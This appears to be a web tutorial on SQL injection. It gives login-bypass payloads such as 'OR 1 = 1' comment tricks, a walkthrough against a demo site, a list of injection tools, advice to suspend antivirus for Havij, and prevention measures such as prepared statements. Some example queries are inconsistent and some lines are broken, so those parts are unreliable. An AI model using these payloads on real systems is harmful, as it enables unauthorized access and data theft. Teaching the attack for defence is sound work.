One of the most important components of information systems is data. The company uses database-driven online applications to collect data from clients. The abbreviation SQL stands for Structured Query Language. It’s used to get data out of a database and manipulate it.
What is a SQL Injection ?
SQL Injection is a technique for poisoning dynamic SQL statements by commenting out sections of the statement or attaching a condition that will always be true. It exploits SQL statements to execute malicious SQL code by exploiting design weaknesses in poorly constructed online applications.
In this tutorial, you will learn SQL Injection techniques and how you can protect web applications from such attacks.
- How SQL Injection Works
- Hacking Activity: SQL Inject a Web Application
- Other SQL Injection attack types
- Automation Tools for SQL Injection
- How to Prevent against SQL Injection Attacks
- Hacking Activity: Use Havji for SQL Injection
How SQL Injection Works
The types of SQL injection attacks that can be carried out differ depending on the database engine. The exploit targets SQL statements that are dynamically generated. A dynamic statement is one that is constructed at runtime from parameters such as a password from a web form or a URI query string.
Let’s consider a simple web application with a login form. The code for the HTML form is shown below.
<form action=‘index.php’ method="post"> <input type="email" name="email" required="required"/> <input type="password" name="password"/> <input type="checkbox" name="remember_me" value="Remember me"/> <input type="submit" value="Submit"/> </form>
The email address and password are collected by the aforementioned form, which then sends them to a PHP file called index.php.
It allows you to save your login session in a cookie. The remember me checkbox has led us to this conclusion. It submits data via the post method. This indicates that the values are not visible in the URL.
Assume the following statement is used in the backend to validate the user ID:
SELECT * FROM users WHERE email = $_POST[’email’] AND password = md5($ POST[‘password’]);
The values of the $_POST array are used straight in the above code without being sanitised.
The MD5 technique is used to encrypt the password.
Using sqlfiddle, we will demonstrate a SQL injection attack. In your web browser, go to http://sqlfiddle.com/.
Step 1) Enter this code in left pane
CREATE TABLE `users` ( `id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR(45) NULL, `password` VARCHAR(45) NULL, PRIMARY KEY (`id`)); insert into users (email,password) values ('firstname.lastname@example.org',md5('abc'));
Step 2) Click Build Schema
Step 3) Enter this code in right pane
select * from users;
Step 4) Click Run SQL.
Suppose user supplies email@example.com and 1234 as the password. The statement to be executed against the database would be
SELECT * FROM users WHERE email = ‘firstname.lastname@example.org’ AND password = md5(‘1234′);
The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.
email@example.com’ OR 1 = 1 LIMIT 1 — ‘ ]
xxx for the password.
The generated dynamic statement will be as follows.
SELECT * FROM users WHERE email = ‘firstname.lastname@example.org’ OR 1 = 1 LIMIT 1 — ‘ ] AND password = md5(‘1234’);
- email@example.com ends with a single quote which completes the string quote
- OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
- — ‘ AND … is a SQL comment that eliminates the password part.
Hacking Activity: SQL Inject a Web Application
For demonstration reasons only, we have a small online application at http://www.techpanda.org/ that is vulnerable to SQL Injection attacks. The HTML form code for the login page is shown above. Basic security features include the ability to sanitise the email field. As a result, our aforementioned code can’t be used to go around the login process.
Let’s suppose an attacker provides the following input
- Step 1: Enter firstname.lastname@example.org as the email address
- Step 2: Enter xxx’) OR 1 = 1 — ]
- Click on Submit button
- You will be directed to the dashboard
The generated SQL statement will be as follows
SELECT * FROM users WHERE email = ‘email@example.com‘ AND password = md5(‘xxx’) OR 1 = 1 — ]’);
- The statement makes the smart assumption that md5 encryption is employed.
- Finishes the single quote by closing the bracket.
- Adds a condition to the statement that ensures it is always true.
In general, a successful SQL Injection attack use a variety of approaches, including the ones listed above, to carry out the assault.
Other SQL Injection attack types
SQL Injections can cause far more damage than simply bypassing login routines. Among the attacks are the following:
- Deleting data
- Updating data
- Inserting data
- Executing commands on the server that can download and install malicious programs such as Trojans
- Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
- Getting user login details etc
The above list is not exhaustive; it just gives you an idea of what SQL Injection
Automation Tools for SQL Injection
In the scenario above, we employed manual attack approaches based on our extensive SQL understanding. There are automated programmes that can assist you in carrying out the attacks more efficiently and quickly. These tools include the following:
- SQLSmack – https://securiteam.com/tools/5GP081P75C
- SQLPing 2 – http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
- SQLMap – http://sqlmap.org/
How to Prevent against SQL Injection Attacks
To protect itself from SQL Injection attacks, a company can implement the following policy.
- User input must always be sanitised before being utilised in dynamic SQL statements.
SQL statements can be encapsulated in stored procedures, which consider all input as arguments.
- Prepared statements function by first constructing the SQL statement and then treating all user data given as arguments. The SQL statement’s syntax is unaffected by this.
- Regular expressions can be used to identify potentially hazardous code and eliminate it before the SQL statements are executed.
- Database connection user access permissions – Accounts used to connect to the database should only have the access privileges they need. This can assist limit the amount of work that SQL statements can do on the server.
- Error messages should not reveal sensitive information or the precise location of an error. Simple custom error messages like “Sorry, we’re having technical difficulties.” A member of the technical team has been notified. Instead of displaying the SQL statements that produced the error, “Please try again later” can be utilised.
Hacking Activity: Use Havij for SQL Injection
We’ll utilise the Havij Advanced SQL Injection application to scan a website for vulnerabilities in this case.
Due to its nature, your anti-virus application may flag it. You should either exclude it from your anti-virus programme or suspend it.
- SQL Injection is an attack type that exploits bad SQL statements
- SQL injection can be used to bypass login algorithms, retrieve, insert, and update and delete data.
- SQL injection tools include SQLMap, SQLPing, and SQLSmack, etc.
- A good security policy when writing SQL statement can help reduce SQL injection attacks.